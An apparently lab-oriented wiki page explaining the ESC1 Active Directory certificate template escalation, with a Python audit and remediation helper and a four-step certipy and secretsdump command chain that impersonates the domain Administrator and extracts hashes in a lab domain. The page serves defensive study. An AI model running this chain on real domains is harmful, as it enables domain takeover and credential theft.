# ESC1 — Certificate Template Privilege Escalation
Status: Scaffold — content in progress
ATT&CK: T1649 — Steal or Forge Authentication Certificates
Platforms: Windows (Active Directory Certificate Services)
Severity: Critical
## What It Exploits
An ADCS certificate template is vulnerable to ESC1 when:
- Low-privilege users can enroll (have the Certificate-Enrollment right on the template)
- The template allows the requester to specify a Subject Alternative Name (SAN) in the certificate request
- The template has the Client Authentication EKU (or Any Purpose, or Smart Card Logon)
Condition 2 is the critical one: the requester can specify any UPN (including Administrator@domain) in the SAN, regardless of who they are. The CA issues the certificate for that identity. The certificate can then be used for Kerberos PKINIT to get a TGT as that user.
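The three conditions above written out as a template audit check, with the matching remediation for each. This is an added example, not certipy's or this page's code: the field names (`name_flag`, `enrollment_flag`, `ra_signatures`, `ekus`, `enrollment_principals`) are assumed to have been populated from the template's LDAP attributes, and the manager-approval / RA-signature gate comes from the SpecterOps ESC1 definition rather than the list above.

```python
# Added audit helper for the three ESC1 conditions (not certipy's or the page's own
# code). Template attributes are assumed already read from AD; samples are constructed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag: requester sets SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: manager approval required

# EKUs that let the issued certificate be used for Kerberos PKINIT logon (condition 3)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Groups whose Enroll right means any domain account can enroll (condition 1)
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}

FIXES = {
    "low-privilege enrollment": "remove the Enroll right from broad groups",
    "enrollee supplies SAN": "clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT so the CA builds the SAN from AD",
    "authentication EKU": "drop the authentication EKUs if the template is not meant for logon",
}

def esc1_findings(tpl):
    """Return the ESC1 conditions a template satisfies (all three = ESC1 candidate)."""
    findings = []
    if tpl["enrollment_principals"] & LOW_PRIV_PRINCIPALS:
        findings.append("low-privilege enrollment")
    if tpl["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies SAN")
    if not tpl["ekus"] or tpl["ekus"] & AUTH_EKUS:  # empty EKU list = any purpose
        findings.append("authentication EKU")
    return findings

def is_esc1(tpl):
    """All three conditions and no approval gate: manager approval or a required
    RA signature stops automatic issuance, so such templates are not ESC1."""
    gated = tpl["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS or tpl["ra_signatures"] > 0
    return len(esc1_findings(tpl)) == 3 and not gated

def remediation(tpl):
    """Changes that each break the ESC1 chain; any one of them is sufficient."""
    fixes = [FIXES[f] for f in esc1_findings(tpl)]
    if not tpl["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        fixes.append("require CA certificate manager approval")
    return fixes

# Constructed samples: the page's VulnerableTemplate and a hardened copy of it.
VULNERABLE = {"name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, "enrollment_flag": 0,
              "ra_signatures": 0, "ekus": {"1.3.6.1.5.5.7.3.2"},
              "enrollment_principals": {"Domain Users"}}
HARDENED = dict(VULNERABLE, name_flag=0, enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS)
```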
## Attack Flow
```bash
# 1. Enumerate vulnerable templates
certipy find -u user@itdr.lab -p 'Password123!' -dc-ip 192.168.56.10 -vulnerable
# 2. Request certificate for Domain Admin
certipy req -u user@itdr.lab -p 'Password123!' -ca ITDR-CA -template VulnerableTemplate \
    -upn Administrator@itdr.lab -dc-ip 192.168.56.10
# 3. Authenticate with certificate to get TGT + NTLM hash
certipy auth -pfx administrator.pfx -dc-ip 192.168.56.10
# Returns: Administrator's NTLM hash + Kerberos TGT
# 4. Use hash for Pass-the-Hash or PtT
secretsdump.py -hashes :NTLMhash 'ITDR/Administrator@dc01.itdr.lab'
```
## CTI Examples
ESC1-class certificate abuse has been reported in post-compromise activity by multiple threat actors. The SpecterOps research (June 2021) codified the vulnerability classes; since then, adoption in red team and threat actor playbooks has been widespread.
Evidence label: Reported | Confidence: Medium | Source reliability: B2
## Why It's Critical
- Low-privilege user → Domain Admin in seconds
- Survives password resets: certificate remains valid even if the target's password is changed
- Low detection footprint: looks like a legitimate certificate enrollment
## Cross-Links
| Topic | Link |
|---|---|
| ADCS Protocol | adcs |
| Certificate Theft | certificate-theft |
| Detection | detect-certificate-attacks |
| Simulation | certificate-escalation |